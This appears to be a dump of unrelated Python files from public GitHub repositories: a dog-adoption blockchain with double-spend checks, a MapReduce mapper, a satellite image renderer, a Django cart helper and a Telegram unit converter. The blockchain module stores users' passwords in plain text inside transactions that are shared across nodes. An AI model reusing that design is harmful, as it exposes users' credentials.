\n    def search_transaction(self, insertkey, insertvalues, insertkey2=None, insertvalues2=None):\n        for i in range(1, len(self.chain)+1):\n            # look up the transactions of each block, newest first\n            block = self.chain[-i]\n            transaction = block['transactions']\n            for n in range(len(transaction)):\n                try:\n                    value01 = transaction[n][insertkey]\n                except KeyError:\n                    continue\n                if value01 == insertvalues:\n                    if insertkey2 is None:\n                        return transaction[n]\n                    else:\n                        try:\n                            if transaction[n][insertkey2] == insertvalues2:\n                                return transaction[n]\n                            else:\n                                continue\n                        except KeyError:\n                            continue\n        return None\n\n    # If transactions exist for the given key/value (and optionally a second key/value),\n    # return all of them as a list.\n    def search_transaction_all(self, insertkey, insertvalues, insertkey2=None, insertvalues2=None):\n        transaction_list = []\n        for i in range(1, len(self.chain)+1):\n            # look up the transactions of each block, newest first\n            block = self.chain[-i]\n            transaction = block['transactions']\n            for n in range(len(transaction)):\n                try:\n                    value01 = transaction[n][insertkey]\n                except KeyError:\n                    continue\n                if value01 == insertvalues:\n                    if insertkey2 is None:\n                        # searching with a single key: the value matched, so collect it\n                        transaction_list.append(transaction[n])\n                    else:\n                        try:\n                            # searching with two keys: also require the second value to match\n                            if transaction[n][insertkey2] == insertvalues2:\n                                transaction_list.append(transaction[n])\n                            else:\n                                continue\n                        except KeyError:\n                            continue\n        return transaction_list\n\n    # Guard against double spending - here, the creation of duplicate transactions.\n    # Returns True when no conflicting transaction exists on the chain or in the queue\n    # (delegates to check_attack_double_simple below, which holds the shared logic).\n    def check_attack_double_standing(self, checktransactions):\n        return self.check_attack_double_simple(checktransactions) is None
\n    def check_attack_double_simple(self, checktransactions):\n        # Update our chain to the latest chain before checking\n        self.resolve_conflicts()\n        transactionlist = []\n        for key, value in checktransactions.items():\n            # collect the matching transactions already recorded on the chain\n            transactionlist.extend(self.search_transaction_all(key, value))\n            # also search the pending-transaction queue for the same key/value\n            for d in range(len(self.current_transactions)):\n                if value == self.current_transactions[d].get(key):\n                    transactionlist.append(self.current_transactions[d])\n        if len(transactionlist) < 1:\n            return None\n        b_count = []  # counts how many times each element appears\n        b_tr = []     # the transactions, aligned with the indices of b_count\n        for a in range(len(transactionlist)):\n            if b_tr.count(transactionlist[a]) >= 1:\n                b_count[b_tr.index(transactionlist[a])] += 1\n            else:\n                b_count.insert(a, 1)\n                b_tr.insert(a, transactionlist[a])\n        new_b = []  # only the duplicated transactions that satisfy the checked condition\n        for b in range(len(b_tr)):\n            if b_count[b] >= len(checktransactions):  # could also use elements appearing at least n times\n                new_b.append(b_tr[b])\n        if len(new_b) == 0:\n            return None\n        else:\n            return new_b\n    # Returns None when no transaction is duplicated, otherwise the list of duplicates.\n\n    # Transaction recording a purchase (adoption) made through this service.\n    def new_transaction_transaction(self, buyer, seller, dog_info, price, transactioncode):\n        checktransaction = {\n            'seller' : seller,  # seller\n            'dog_info' : dog_info  # dog information\n        }\n        sleep(random.randrange(1, 3))\n        # Sleep for a short random interval; validating after a random delay helps\n        # detect double-transaction attacks.\n        checkpara = self.check_attack_double_standing(checktransaction)\n        # Check for a double-spending attack\n        if checkpara:\n            # the check returned True, so no duplicate transaction was found\n            createtransaction = {\n                'buyer':buyer,\n                'seller':seller,\n                'dog_info':dog_info,\n                'price': price,\n                'transactioncode':transactioncode,\n                'owner':None,\n                'idcode':None,\n                'idname':None,\n                'emailid':None,\n                'idpw':None,\n                'img_hash':None,\n                'hash_transaction_id':None\n            }\n            # register the transaction in the pending queue\n            self.current_transactions.append(createtransaction)\n            return self.last_block['index']+1\n        else:\n            # the check failed, so treat this as an incoming attack;\n            # the transaction is ignored because validation failed\n            return self.last_block['index']\n\n    # Registers the user's id and password on the network when signing up for the service.\n    def new_transaction_registerid(self, idcode, idname, emailid, idpw, transactioncode, okaykey=False, setkey=None):\n        checktransaction = {\n            'emailid' : emailid,  # email id\n            'transactioncode' : transactioncode  # transaction code\n        }\n        sleep(random.uniform(1, 3))\n        # Sleep for a short random interval; validating after a random delay helps\n        # detect double-transaction attacks.\n        checkpara = self.check_attack_double_standing(checktransaction)\n        # Check for a double-spending attack\n        if checkpara:\n            createtransaction = {\n                'buyer':None,\n                'seller':None,\n                'dog_info':None,\n                'price': None,\n                'transactioncode':transactioncode,\n                'owner':None,\n                'idcode':idcode,\n                'idname':idname,\n                'emailid':emailid,\n                'idpw':idpw,\n                'img_hash':None,\n                'hash_transaction_id':None\n            }\n            # the check passed: register the transaction in the pending queue\n            self.current_transactions.append(createtransaction)\n            return self.last_block['index']+1\n        else:\n            # the check failed, so treat this as an incoming attack\n            return self.last_block['index']\n\n    # Builds the record holding a dog's information.\n    def get_dog_information(self, email_id, owner, name, sex, species, imgnosepath, key1, des1):\n        keypoints_dict = []\n        for kp in key1:\n            kp_dict = {\n                'pt': (kp.pt[0], kp.pt[1]),\n                'size': kp.size,\n                'angle': kp.angle,\n                'response': kp.response,\n                'octave': kp.octave,\n                'class_id': kp.class_id
\n            }\n            keypoints_dict.append(kp_dict)\n        # cv2 keypoints must be converted to plain dicts like this before they can be\n        # serialized to JSON\n        dog_info = {\n            'ownerid':email_id,  # email id (column linking to the general DB that holds login info)\n            'owner':owner,  # owner name\n            'name':name,  # dog name\n            'sex' : sex,  # dog sex\n            'species': species,  # dog species\n            'imgnosepath': imgnosepath,  # absolute path where the image is stored\n            'imagekey': keypoints_dict,  # keypoint information of the image (list)\n            'imagedes': des1.tolist()  # descriptors of those keypoints (array)\n        }\n        # (the chain could be checked here for duplicates of the entered dog information)\n\n        # Print the information passed via GET\n        print('%s' %email_id)\n        print('%s' %owner)\n        print('%s' %sex)\n        print('%s' %species)\n        return dog_info\n\n    # Dog information search function.\n    def dog_info_search(self, search_col, transactioncode):\n        result_list = []\n        checktransaction = {\n            'transactioncode' : transactioncode  # dog info / adoption status (waiting, adopted)\n        }\n        # extract, as a list, the transactions whose transaction code marks a dog-info entry\n        checkpara = self.check_attack_double_simple(checktransaction)\n        if checkpara:\n            # range runs to len+1 so the oldest entry is not skipped\n            for i in range(1, len(checkpara)+1):\n                append_tr = None\n                checktr = checkpara[-i]\n                for key, value in search_col.items():\n                    if checktr.get(key) != value:\n                        append_tr = None\n                        break\n                    else:\n                        append_tr = checktr\n                if append_tr is not None:\n                    result_list.append(append_tr)\n        return result_list\n\n    def new_registration_dog(self, owner, dog_info, transactioncode):\n        checktransaction = {\n            'owner' : owner,  # owner id\n            'dog_info' : dog_info,  # dog information\n            'transactioncode' : transactioncode  # transaction code: dog info registration\n        }\n        sleep(random.uniform(1, 3))\n        # Sleep for a short random interval; validating after a random delay helps\n        # detect double-transaction attacks.\n        checkpara = self.check_attack_double_standing(checktransaction)\n        if checkpara:\n            createtransaction = {\n                'buyer':None,\n                'seller':None,\n                'dog_info':dog_info,\n                'price': None,\n                'transactioncode':transactioncode,\n                'owner':owner,\n                'idcode':None,\n                'idname':None,\n                'emailid':None,\n                'idpw':None,\n                'img_hash':None,\n                'hash_transaction_id':None\n            }\n            # the check passed: register the transaction in the pending queue\n            self.current_transactions.append(createtransaction)\n            return self.last_block['index'] + 1\n        else:\n            return self.last_block['index']\n\n    # Register a node (full node) with the blockchain server.\n    def register_node(self, address):\n        parsed_url = urllib.parse.urlparse(address)\n        # store the joining node's network location\n        self.nodes.add(parsed_url.netloc)  # netloc attribute: network location\n\n    # Checks whether a chain is valid.\n    def valid_chain(self, chain):\n        # Treated like a queue, the first block added sits at the head of the chain.\n        # The chain is validated by comparing each block's hash with the next block's\n        # previous_hash value.\n        last_block = chain[0]\n        # start from the genesis block as the first block whose hash is compared\n        current_index = 1\n        # check sequentially over the length of the chain\n        while current_index < len(chain):\n            block = chain[current_index]\n            print('%s' % last_block)\n            print('%s' % block)\n            print(\"\\n---------\\n\")\n            # check that the hash of the block is correct: compare this block's\n            # previous_hash with the actual hash of the previous block; if they do\n            # not match, the chain is invalid\n            if block['previous_hash'] != self.hash(last_block):\n                return False\n            # make the current block the last block and keep comparing\n            last_block = block\n            # advance the chain index by 1\n            current_index += 1\n        return True\n\n    def request_update_chain(self):\n        # Always executed after mining: starting from the node that mined and appended\n        # the block, bring every other node up to date with the newly added block.
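\n        # Flow sketch (assuming each peer exposes the /nodes/resolved route used below):\n        # after mining, this node calls request_update_chain(), and every peer then runs\n        # its own resolve_conflicts() to adopt the longest valid chain.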
\n        neighbours = self.nodes\n        # the other nodes registered on this blockchain network\n        for node in neighbours:\n            tmp_url = 'http://' + str(node) + '/nodes/resolved'\n            # ask each node to update itself\n            response = requests.get(tmp_url)\n            if response.status_code == 200:\n                # the node answered whether it updated itself to our chain\n                print(\"response : \"+response.json()['message'])\n        print(\"All nodes updated to my chain\")\n        return True\n\n    def resolve_conflicts(self):\n        # After a block has been created and appended, check whether this node's chain\n        # is valid; inspect every other node's chain, and if a longer, valid chain is\n        # found, adopt it.\n        neighbours = self.nodes\n        # the other nodes registered on this blockchain network\n        new_chain = None\n        # the chain to update to; starts as None because our own chain is assumed newest\n        max_length = len(self.chain)\n        # Our chain length\n        for node in neighbours:\n            # compare each node's chain; if it is longer than ours and valid, adopt it\n            tmp_url = 'http://' + str(node) + '/chain'\n            # url that returns that node's chain (served by the server module)\n            response = requests.get(tmp_url)\n            if response.status_code == 200:\n                # the request succeeded\n                length = response.json()['length']\n                # chain length of that node, taken from the json response\n                chain = response.json()['chain']\n                # the node's chain itself, taken from the json response\n                if length > max_length and self.valid_chain(chain):\n                    # that node's chain is longer than ours and valid\n                    max_length = length\n                    # remember the new longest length\n                    new_chain = chain\n                    # and the chain we will update to\n                    continue\n        if new_chain:\n            # a longer valid chain was found, so replace ours with it\n            self.chain = new_chain\n            return True\n        return False\n        # our chain was already the newest (new_chain stayed None), so return False\n\n    # directly accessed from the class and shared - no individual instance owns it\n    @staticmethod\n    # staticmethod makes the function usable globally, outside the Blockchain class\n    def hash(block):\n        block_serialized = str(block)\n        # serialize the block dict to a string and encode it before hashing\n        return hashlib.sha256(block_serialized.encode()).hexdigest()\n        # sha256: a one-way cryptographic hash that yields a 64-character (256-bit) digest\n    @property\n    # the property decorator gives this method getter semantics\n    def last_block(self):\n        # return the block most recently appended to the chain\n        return self.chain[-1]\n    def pow(self, last_proof):\n        # A node that wants to mine a block must first prove that it is able to do so.\n        # Proof of work (PoW) is one such scheme: the mining node spends compute\n        # searching for a value whose hash satisfies the network's condition; finding\n        # it proves the node may create the block.\n        proof = 0\n        # proof is the nonce: it keeps incrementing during PoW until the condition is met
\n        while self.valid_proof(last_proof, proof) is False:\n            proof += 1\n        return proof\n    @staticmethod\n    def valid_proof(last_proof, proof):\n        # One step of the PoW search: combine the fixed hash input of the block with\n        # the nonce and test the guess.\n        guess = str(last_proof + proof).encode()\n        # encode the block's hash input plus the nonce as a string\n        guess_hash = hashlib.sha256(guess).hexdigest()\n        # feed the encoded string to sha256 and read the digest back as a\n        # 64-character hexadecimal string\n        return guess_hash[:4] == \"0000\" \n        # the guess succeeds when the first four hex digits are 0000\n","repo_name":"jyc0011/block_chain","sub_path":"blockchain/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":24191,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"26052229358","text":"#!/usr/bin/python3\n\nimport sys\nfrom nltk.tokenize import word_tokenize\n\nfor line in sys.stdin:\n    words = word_tokenize(line.strip())\n    unique_words = list(set(words))\n    for word in unique_words:\n        print(f\"{word}\\t1\")\n","repo_name":"aditeyabaral/mapreduce-word2vec","sub_path":"src/mapper0.py","file_name":"mapper0.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"16433122987","text":"from datetime import datetime\nfrom os import system\nfrom os.path import join\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.basemap import Basemap\n\nfrom _FileSearch import FileSearch\nfrom _Settings import Settings\nfrom colormap import Colormap\nfrom satellite import _sate_param\nfrom satellite.utils import (convert_time_format, get_multi_choices_template,\n                             is_ascii, safe_input, safe_str2value,\n                             unique_elements)\n\nDEBUG = False\n\nclass Satima:\n\n    def __init__(self, FileSearch):\n        self.fid = FileSearch.choice\n        self.settings = Settings().settings\n        self.fileclass = FileSearch.fileclass[self.fid['type'].upper()](self.fid)\n        self.channel_flag = self.fileclass.get_channel_info()\n        self.common_imoptions = {'Common':[], 'Composite':[]}\n        self.spec_imoptions = {'WV-Enhanced':{'channels':[],'colormaps':[]}, 'IR-Enhanced':{'channels':[],'colormaps':[]}}\n        self.raw = {}\n        self.run()
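\n\n    # run() drives the interactive pipeline in order: list the available image options,\n    # read the user's choices, then ask for the geographic range, image size and title\n    # before building the map and rendering every requested image.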
\n    def run(self):\n        self.get_options()\n        self.get_choices()\n        self.get_georange()\n        self.get_size()\n        self.get_title()\n        self.set_map()\n        self.processor()\n\n    def get_options(self):\n        wv_colormaps, ir_colormaps = Colormap.get_colormap_list()\n        for imtype in self.channel_flag.keys():\n            if self.channel_flag[imtype]:\n                self.common_imoptions['Common'].append(imtype)\n        for imtype in self.fileclass.composite.keys():\n            composite_flag = [self.channel_flag[channel_require] for channel_require in self.fileclass.composite[imtype]]\n            if all(composite_flag):\n                self.common_imoptions['Composite'].append(imtype)\n        for wv in self.fileclass.channels['wv']:\n            if self.channel_flag[wv]:\n                self.spec_imoptions['WV-Enhanced']['channels'].append(wv)\n        self.spec_imoptions['WV-Enhanced']['colormaps'] = wv_colormaps\n        for ir in self.fileclass.channels['ir']:\n            if self.channel_flag[ir]:\n                self.spec_imoptions['IR-Enhanced']['channels'].append(ir)\n        self.spec_imoptions['IR-Enhanced']['colormaps'] = ir_colormaps\n\n    def get_choices(self):\n        count = 0\n        choicedict = {}\n        print()\n        for imcategory, imtypes in self.common_imoptions.items():\n            if len(imtypes) == 0:\n                continue\n            print('[{}]'.format(imcategory), end='')\n            for imtype in imtypes:\n                count += 1\n                print(' {0:d}.{1:s}'.format(count, imtype.upper()), end='')\n                choicedict[count] = (imcategory, imtype)\n            print()\n        for imcategory, iminfo in self.spec_imoptions.items():\n            num_of_channels = len(iminfo['channels'])\n            if num_of_channels == 0:\n                continue\n            print('[{}]'.format(imcategory), end='')\n            for imchannel in iminfo['channels']:\n                if num_of_channels > 1:\n                    print('[{}]'.format(imchannel), end='')\n                for imtype in iminfo['colormaps']:\n                    count += 1\n                    print(' {0:d}.{1:s}'.format(count, imtype.upper()), end='')\n                    choicedict[count] = (imchannel, imtype)\n                print()\n        raw_choices = get_multi_choices_template(choicedict.keys(), 'Enter the image types to produce: ', sort=True)\n        self.choices = [choicedict[choice] for choice in raw_choices]\n        print()\n\n    def get_georange(self):\n        if 'AUTOGEO' in self.fid.get('flag', []):\n            self.georange = self.fileclass.get_auto_georange()\n            return\n        while True:\n            latmin = safe_input('Enter the southernmost latitude: ')\n            latmax = safe_input('Enter the northernmost latitude: ')\n            lonmin = safe_input('Enter the westernmost longitude: ')\n            lonmax = safe_input('Enter the easternmost longitude: ')\n            if lonmin < 0:\n                lonmin += 360\n            if lonmax < 0:\n                lonmax += 360\n            if latmin >= latmax:\n                print('Invalid latitudes.')\n                continue\n            if lonmin >= lonmax:\n                print('Invalid longitudes.')\n                continue\n            if not self.fileclass.remap:\n                saterange = _sate_param._data_[self.fid['sate']]['georange']\n                if latmax > saterange[0] or latmin < saterange[1] or lonmax > saterange[2] or lonmin < saterange[3]:\n                    print('Input range is invalid.')\n                    print('Reference range: latitude {}~{}, longitude {}~{}'.format(saterange[1], saterange[0], saterange[3], saterange[2]))\n                    continue\n            self.georange = (latmin, latmax, lonmin, lonmax)\n            print()\n            return\n\n    def get_size(self):\n        latmin, latmax, lonmin, lonmax = self.georange\n        ratio = (latmax - latmin) / (lonmax - lonmin)\n        print('The default image size is 2000x{:d}. You may set a custom width; the height is scaled proportionally.'.format(int(2000*ratio)))\n        width = safe_input('Enter a custom image width (500~4000), or press Enter for the default: ', func=int, vrange=(500, 4000), default=2000)\n        self.dpi = width / Settings.widthsize\n        self.figsize = (Settings.widthsize, Settings.widthsize*ratio)\n        print()\n\n    def get_title(self):\n        if self.settings['switch']['title']:\n            self.title = input('Enter the image title: ')\n            ascii_flag = is_ascii(self.title)\n            self.title_font = self.settings['font']['title'] if ascii_flag else self.settings['font']['title_nonascii']\n            self.title_weight = self.settings['font']['title_weight'] if ascii_flag else self.settings['font']['title_nonascii_weight']\n        self.basic_info = convert_time_format(self.fid['time']) + ' {} '.format(self.fid['sate'])\n        print()\n\n    def get_colormap(self, choice):\n        imcategory, imtype = choice\n        if imcategory == 'Common':\n            if imtype in self.fileclass.channels['ir'] or imtype in self.fileclass.channels['wv']:\n                return 'gray_r'\n            return 'gray'\n        cmap = Colormap.get_colormap(imtype)\n        if cmap == 0:\n            print(imtype.upper() + ' colormap has a problem; falling back to grayscale.')\n            return 'gray_r'\n        return cmap\n\n    def get_imtype(self, choice):\n        imcategory, imtype = choice\n        if imcategory in ('Common', 'Composite'):\n            return imtype\n        return imcategory + '-' + imtype\n\n    def set_map(self):\n        if self.settings['switch']['coastline'] or self.settings['switch']['borderline'] or self.settings['switch']['latlon']:\n            latmin, latmax, lonmin, lonmax = self.georange\n            resolution = self.settings['image']['resolution']\n            if resolution not in ('c', 'l', 'i', 'h', 'f'):\n                resolution = 'i'\n            self.map = Basemap(projection='cyl', llcrnrlat=latmin, urcrnrlat=latmax, llcrnrlon=lonmin, urcrnrlon=lonmax, resolution=resolution)\n\n    def get_imager_kwargs(self, choice):\n        imcategory, imtype = choice\n        if imcategory == 'Composite':\n            return {}\n        cmap = self.get_colormap(choice)\n        if imcategory == 'Common':\n            if imtype in self.fileclass.channels['vis']:\n                return {'vmin': 0., 'vmax': 1., 'cmap':cmap}\n            elif imtype in self.fileclass.channels['ir']:\n                return {'vmin': -80., 'vmax': 50., 'cmap':cmap}\n        if imcategory not in ('Common', 'Composite'):\n            return {'vmin': -100., 'vmax': 50., 'cmap':cmap}\n        return {}\n\n    def find_corresponding_channel(self, choice):\n        imcategory, imtype = choice\n        if imcategory == 'Common':\n            return (imtype,)\n        if imcategory == 'Composite':\n            return self.fileclass.composite[imtype]\n        return (imcategory,)\n\n    def get_required_channels(self):\n        required_channels = []\n        for choice in self.choices:\n            channels = self.find_corresponding_channel(choice)\n            required_channels.extend(list(channels))\n        return unique_elements(required_channels)\n\n    def clear_unnecessary_channel(self):\n        required_channels = self.get_required_channels()\n        to_be_del = []\n        for channel in self.raw.keys():\n            if channel not in required_channels:\n                to_be_del.append(channel)\n        for channel in to_be_del:\n            del self.raw[channel]\n\n    def load_channel(self, channel):\n        if channel not in self.raw.keys():\n            self.raw[channel] = self.fileclass.extract(channel, self.georange)\n        return self.raw[channel]\n\n    def load_channel_8bit(self, channel):\n        data = self.load_channel(channel)\n        if channel in self.fileclass.channels['vis']:\n            return np.uint8(np.clip(data, 0, 1)*255)\n        if channel in self.fileclass.channels['ir']:\n            return np.uint8((np.clip(data, -100, 50) + 100) * (255/150))\n        data_min, data_max = np.amin(data), np.amax(data)\n        return np.uint8((data - data_min) * (255/(data_max - data_min)))\n\n    def load_raw(self, choice):\n        channel = self.find_corresponding_channel(choice)\n        if len(channel) == 1:\n            return self.load_channel(channel[0])\n        elif self.fileclass.remap:\n            return self.remap_rgb(channel)\n        else:\n            return self.merger(channel)\n\n    def load_geocoord(self, choice):\n        channel = self.find_corresponding_channel(choice)\n        if len(channel) == 1:\n            ch = channel[0]\n        else:\n            ch = channel[np.argmin([self.fileclass.resolution[c] for c in channel])]\n        return self.fileclass.geocoord(ch)\n\n    def load_masked_raw_geocoord(self, choice, _8bit=False):\n        EDGE = 0.05\n        if _8bit:\n            raw = self.load_channel_8bit(choice[1])\n        else:\n            raw = self.load_raw(choice)\n        lon, lat = self.load_geocoord(choice)\n        latmin, latmax, lonmin, lonmax = self.georange\n        bool_arr_ind = np.where((lat > latmin - EDGE) & (lat < latmax + EDGE) & (lon > lonmin - EDGE) & (lon < lonmax + EDGE))\n        ymin, ymax = np.amin(bool_arr_ind[0]), np.amax(bool_arr_ind[0])\n        xmin, xmax = np.amin(bool_arr_ind[1]), np.amax(bool_arr_ind[1])\n        raw = raw[ymin:ymax, xmin:xmax]\n        lat = lat[ymin:ymax, xmin:xmax]\n        lon = lon[ymin:ymax, xmin:xmax]\n        return raw, lon, lat\n\n    def merger(self, channel):\n        finest_resolution = min([self.fileclass.resolution[c] for c in channel])\n        temp_raw = {}\n        for c in channel:\n            if c not in temp_raw.keys():\n                if self.fileclass.resolution[c] != finest_resolution:\n                    multifier = self.fileclass.resolution[c] // finest_resolution\n                    temp_raw[c] = np.kron(self.load_channel_8bit(c), np.ones((multifier, multifier)))\n                else:\n                    temp_raw[c] = self.load_channel_8bit(c)\n        return np.dstack((temp_raw[channel[0]], temp_raw[channel[1]], temp_raw[channel[2]]))\n\n    def remap_rgb(self, channel):\n        # rasterize each channel to a temporary TMP*.png, then read the three grayscale\n        # rasters back and stack them into an RGB array\n        for i in range(3):\n            fig = plt.figure(figsize=self.figsize)\n            choice = 'Common', channel[i]\n            mat, lon, lat = self.load_masked_raw_geocoord(choice)\n            self.map.pcolormesh(lon, lat, mat, latlon=True, cmap=self.get_colormap(choice))\n            plt.axis('off')\n            plt.tight_layout(pad=0.)\n            plt.savefig(join(self.fid['fdir'], 'TMP%d.png' % (i)), dpi=self.dpi)\n            plt.clf()\n        return np.dstack(tuple([plt.imread(join(self.fid['fdir'], 'TMP%d.png' % (i)))[:,:,0] for i in range(3)]))\n\n    def processor(self):\n        for i in range(len(self.choices)):\n            ch = self.choices.pop()\n            print('Making ' + self.get_imtype(ch).upper() + '...')\n            self.imager(ch)\n            self.clear_unnecessary_channel()\n\n    def imager(self, choice):\n        fig = plt.figure(figsize=self.figsize)\n        ax = fig.add_axes([0, 0, 1, 1])\n        if not self.fileclass.remap:\n            mat = self.load_raw(choice)\n            plt.imshow(mat, interpolation='nearest', extent=[self.georange[2], self.georange[3], self.georange[0], self.georange[1]],\n                       **self.get_imager_kwargs(choice))\n        elif choice[0] != 'Composite':\n            mat, lon, lat = self.load_masked_raw_geocoord(choice)\n            self.map.pcolormesh(lon, lat, mat, latlon=True, **self.get_imager_kwargs(choice))\n            del lon, lat\n        else:\n            mat = self.load_raw(choice)\n            plt.imshow(mat, interpolation='nearest', extent=[self.georange[2], self.georange[3], self.georange[0], self.georange[1]])\n        if choice[0] not in ('Common', 'Composite') and self.settings['switch']['maxtbb']:\n            print('(For reference only) maximum cloud-top temperature: %.2fdegC' % (np.amax(mat)))\n        del mat\n        if self.settings['switch']['title']:\n            plt.annotate(self.title, xy=(0.04,0.04), va='bottom', xycoords='axes fraction',\n                         bbox=dict(facecolor='w', edgecolor='none', alpha=0.5), fontsize=12, family=self.title_font, weight=self.title_weight)\n        plt.annotate((self.basic_info+self.get_imtype(choice)).upper(), xy=(0.5,0), va='bottom', ha='center', xycoords='axes fraction',\n                     bbox=dict(facecolor='w', edgecolor='none', alpha=0.7), fontsize=6, family=self.settings['font']['info'], weight=self.settings['font']['info_weight'])\n        if self.settings['switch']['coastline']:\n            self.map.drawcoastlines(**self.settings['coastline'])\n        if self.settings['switch']['borderline']:\n            self.map.drawcountries(**self.settings['borderline'])\n        if self.settings['switch']['latlon']:\n            self.map.drawparallels(range(-90,90,self.settings['latlon']['step']), linewidth=self.settings['latlon']['width'],\n                                   dashes=(None, None), color=self.settings['latlon']['color'])\n            self.map.drawmeridians(range(0,360,self.settings['latlon']['step']), linewidth=self.settings['latlon']['width'],\n                                   dashes=(None, None), color=self.settings['latlon']['color'])\n        plt.axis('off')\n        plt.savefig(join(self.fid['fdir'], self.get_imtype(choice).upper() + self.fid['time'] + '.png'),\n                    dpi=self.dpi, facecolor=self.settings['image']['background'])\n        plt.clf()\n\ndef launcher(path='.'):\n    FS = FileSearch(path)\n    Satima(FS)\n\nlauncher()\n","repo_name":"crazyapril/satima","sub_path":"Satima.py","file_name":"Satima.py","file_ext":"py","file_size_in_byte":14630,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"67"}
+{"seq_id":"15417957343","text":"from .models import Order, Product, HistoryProducts\n\n\nclass CartForAuthenticatedUser:\n    def __init__(self, request, product_slug=None, product_color=None, action=None):\n        self.user = request.user\n\n        if product_slug and product_color and action:\n            self.add_or_delete(product_slug=product_slug, product_color=product_color, action=action)\n        elif product_slug and product_color:\n            self.delete_product(product_slug=product_slug, product_color=product_color)\n\n    def get_cart_info(self):\n        order, _ = Order.objects.get_or_create(user=self.user, is_completed=False)\n        products = order.orderproduct_set.all()\n        cart_total_quantity = order.get_cart_total_quantity\n        cart_total_price = order.get_cart_total_price\n\n        return {\n            
'cart_total_quantity': cart_total_quantity,\n 'cart_total_price': cart_total_price,\n 'order_products': products,\n 'order': order\n }\n\n def add_or_delete(self, product_slug, product_color, action):\n order = self.get_cart_info()['order']\n product = Product.objects.get(slug=product_slug)\n order_product, created = order.orderproduct_set.get_or_create(product=product, color_title=product_color)\n\n if action == 'add' and product.quantity_in_storage > 0:\n product.quantity_in_storage -= 1\n order_product.quantity += 1\n else:\n product.quantity_in_storage += 1\n order_product.quantity -= 1\n\n product.save()\n order_product.save()\n\n if order_product.quantity <= 0:\n order_product.delete()\n\n def clear(self):\n order = self.get_cart_info()['order']\n order_products = order.orderproduct_set.all()\n for order_product in order_products:\n history = HistoryProducts.objects.create(user=self.user)\n history.product = order_product.product\n history.order_number = order_product.order.pk\n history.price = order_product.get_total_price\n history.quantity = order_product.quantity\n history.save()\n order_product.delete()\n order.save()\n\n def delete_product(self, product_slug, product_color):\n order = self.get_cart_info()['order']\n order_product = order.orderproduct_set.get(product__slug=product_slug, color_title=product_color)\n order_product.delete()\n order.save()\n","repo_name":"SarvarAi/LoftMebel","sub_path":"loft/store/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23463989444","text":"import telebot\nimport database\n\nmain_units = ['m', 'g', 's']\nunits_1 = {'mm': 1000, 'cm': 100, 'in': 39.37, 'dm': 10, 'ft': 3.281, 'm': 1, 'km': 0.001, 'mi': 0.000621371}\nunits_2 = {'mg': 1000, 'dag': 10, 'g': 1, 'oz': 0.03527396, 'lb': 0.00220462, 'kg': 0.001, 't': 0.000001}\nunits_3 = {'ms': 1000, 's': 1, 'min': 1/60, 'h': 1/3600, 'd': 1/86400, 'wk': 1/604800, 'mo': 1/2592000, 'yr': 1/31536000}\n\n# check if the message contains any known unit\ndef check_message(message: telebot.types.Message) -> tuple[int, str, str]:\n text = message.text\n #-------------------------------------------------------\n text_test = text.replace(' ', '')\n units = sorted(list(units_1.keys()), key=len, reverse=True)\n unit = ''\n for element in units:\n if element in text_test:\n unit = element\n text_test = text_test.replace(element, '')\n break\n if text_test.replace('.', '').isdigit():\n return (1, unit, text_test)\n #-------------------------------------------------------\n text_test = text.replace(' ', '')\n units = sorted(list(units_2.keys()), key=len, reverse=True)\n unit = ''\n for element in units:\n if element in text_test:\n unit = element\n text_test = text_test.replace(element, '')\n break\n if text_test.replace('.', '').isdigit():\n return (2, unit, text_test)\n #-------------------------------------------------------\n text_test = text.replace(' ', '')\n units = sorted(list(units_3.keys()), key=len, reverse=True)\n unit = ''\n for element in units:\n if element in text_test:\n unit = element\n text_test = text_test.replace(element, '')\n break\n if text_test.replace('.', '').isdigit():\n return (3, unit, text_test)\n #-------------------------------------------------------\n return (0, '', '')\n\n# get number with its unit to main unit\ndef get_to_main_unit(num: float, unit: str, x: int) -> float:\n if x == 1:\n return num/units_1[unit]\n elif x == 2:\n return 
num/units_2[unit]\n elif x == 3:\n return num/units_3[unit]\n\n# change unit and send message to user\ndef change_unit(num: float, x: int) -> str:\n msg = ''\n if x == 1:\n for unit in list(units_1.keys()):\n _ = \"{:g}\".format(num * units_1[unit])\n msg = msg + telebot.telebot.formatting.hitalic(unit + \": \") + _ + \"\\n\"\n elif x == 2:\n for unit in list(units_2.keys()):\n _ = \"{:g}\".format(num * units_2[unit])\n msg = msg + telebot.telebot.formatting.hitalic(unit + \": \") + _ + \"\\n\"\n elif x == 3:\n for unit in list(units_3.keys()):\n _ = \"{:g}\".format(num * units_3[unit])\n msg = msg + telebot.telebot.formatting.hitalic(unit + \": \") + _ + \"\\n\"\n return msg\n\n# handle messages with known units\ndef message_handler(message: telebot.types.Message, bot: telebot.TeleBot):\n text1 = database.get_message_text(message, 'unitconverter')\n x, unit, num = check_message(message)\n _num = num\n try:\n num = float(num)\n except:\n text2 = database.get_message_text(message, 'error')\n mess = bot.send_message(message.chat.id, telebot.telebot.formatting.hbold(text1 + \":\\n\\n\") + text2, parse_mode = 'html')\n database.register_last_message(mess)\n msg = database.get_message_text(message, 'error')\n if x > 0:\n if unit in main_units:\n msg = change_unit(num, x)\n else:\n num = get_to_main_unit(num, unit, x)\n msg = change_unit(num, x)\n text2 = telebot.telebot.formatting.hbold(unit + \": \" + _num)\n mess = bot.send_message(message.chat.id, telebot.telebot.formatting.hbold(text1 + \":\\n\\n\") + text2 + \"\\n\" + msg[:-1], parse_mode = 'html')\n database.register_last_message(mess)","repo_name":"Cezary924/Telegram-Bot","sub_path":"bot/unit_converter.py","file_name":"unit_converter.py","file_ext":"py","file_size_in_byte":3820,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"41954223539","text":"\"\"\"\nCheck Prime\n\"\"\"\n\nn = int(input('Enter a number to check if it is prime: '))\n\ndef checkPrime(n):\n if n <= 1:\n return False\n\n if n == 2:\n return True\n\n i = 2\n while i < n:\n if n % i == 0:\n return False\n i += 1\n\n return 